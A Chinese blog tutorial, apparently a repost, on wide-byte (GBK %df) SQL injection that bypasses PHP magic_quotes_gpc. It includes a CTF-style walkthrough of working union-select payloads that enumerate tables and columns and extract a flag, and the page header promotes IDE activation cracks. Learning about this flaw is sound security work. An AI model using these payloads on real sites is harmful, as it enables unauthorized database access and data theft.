宽字节注入（一）_低字节在前高字节在后

全栈程序员-站长 • 2022年10月14日下午12:16 • 未分类 • 阅读 2

大家好，又见面了，我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

在PHP中有这样一个函数：
magic_quotes_gpc
它的作用就是将你输入的特殊字符前面统统加一个 \ 符号

如下图前2句话

在这里插入图片描述
在看下面这条语句之前，我们首先需要知道。

\'  只能和\'进行闭合

下面这个语句，显然不能将 1 进行闭合。而是将 \ 当成了一个字符串。后面的单引号把后面的给后面的给闭合了。

不能闭合，就显然不能进行SQL注入。这就是magic_quotes_gpc函数的作用了。

select * from admin where id='1\' union select -- + '

而遇到魔术引号这哥函数，我们有2种方法，下面就来介绍宽字节注入
在这里插入图片描述

宽字节注入原理

上面我们已经知道了魔术引号的作用了，是将特殊字符前加一个 \ 符号，这样就不能闭合了。
而我们想要SQL注入的话，就必须闭合才能SQL注入。

前提条件：
数据库必须是其他编码，比如utf-8 , gbk ,不能是英语编码（ascii）就行

然后我们知道 \ 的编码为 5c 也就是一个字符，而gbk编码是占2个字符，utf-8编码是占3个字符，
这里我们就以 gbk编码来举列子，5c加上另一个字符就可以组成一个汉字，比如 d55c 就可以组成一个繁体汉字“誠”
而我们这里是URL传参，所以是 %d5%5c
在这里插入图片描述

举例

id=1%df' union select 1,2,3 — qwe 
为了绕过转义，成功闭合，只是在前面有这一点不同，其余都是以前的知识。

为了绕过转义，成功闭合，只是在前面有这一点不同，其余都是以前的知识。

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

以下是练习，可以不用看


%df' and 1=1 -- + 回显正常 %df' and 1=2 -- + 回显错误
说明存在sql注入，而且是宽字节注入

在这里插入图片描述
判断字段数

%df' order by 3 -- + 回显正常 %df' order by 4 -- + 回显错误，那就说明有3个字段

在这里插入图片描述
判断回显位

%df' union select 1,2,3 -- +

从上面我们知道有2个回显位
那么现在就来判断数据库版本和当前数据库
在这里插入图片描述
联合查询当前数据库里的表
这里我就不过多介绍一些数据库函数了，在显错注入（一）里有介绍

 %df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- +

在这里插入图片描述
联合查询表里的字段
在这里我们很明显是为了拿flag，那么就选第一个表，其他的表就不多测试了

因为这里有魔术引号，所以不能写特殊符号，所以下面这个是错的，后面有特殊符号（单引号）

因为这里有魔术引号，所以不能写特殊符号，所以下面这个是错的，后面有特殊符号（单引号）
%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='china_flag' -- +

第一种方法：那么就不选表，全部输出

%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() -- +

在这里插入图片描述
第二种方法：如果硬要选择表的话，那就是

%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select table_name from information_schema.tables where table_schema=database() limit 0,1) -- +

第三种方法：因为数据库认识16进制，那么我们查询出表之后，就把表的字符转成16进制。
网站地址 https://www.bejson.com/convert/ox2str/
在这里插入图片描述
0x是16进制的标识

%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x6368696e615f666c6167 -- +

在这里插入图片描述
联合查询表里的字段

%df' union select 1,2,group_concat(C_Flag) from china_flag -- +

在这里插入图片描述
好了，成功拿到flag！

发布者：全栈程序员-站长，转载请注明出处：https://javaforall.net/182115.html原文链接：https://javaforall.net

宽字节注入（一）_低字节在前高字节在后

如下图前2句话

不能闭合，就显然不能进行SQL注入。这就是magic_quotes_gpc函数的作用了。

宽字节注入原理

举例

为了绕过转义，成功闭合，只是在前面有这一点不同，其余都是以前的知识。

以下是练习，可以不用看

因为这里有魔术引号，所以不能写特殊符号，所以下面这个是错的，后面有特殊符号（单引号）

相关推荐

phpstorm2021永久激活码[在线序列号][通俗易懂]

Spring Boot第八章-非关系型数据库（MongoDB，Redis）

博弈论案例分析题及答案_微软技术支持面试题

lvm扩容是否影响oracle,LVM实战案例之LVM扩容

sql将截断字符串或二进制数据. 语句已终止_数据库将截断字符串

ICE初识

发表回复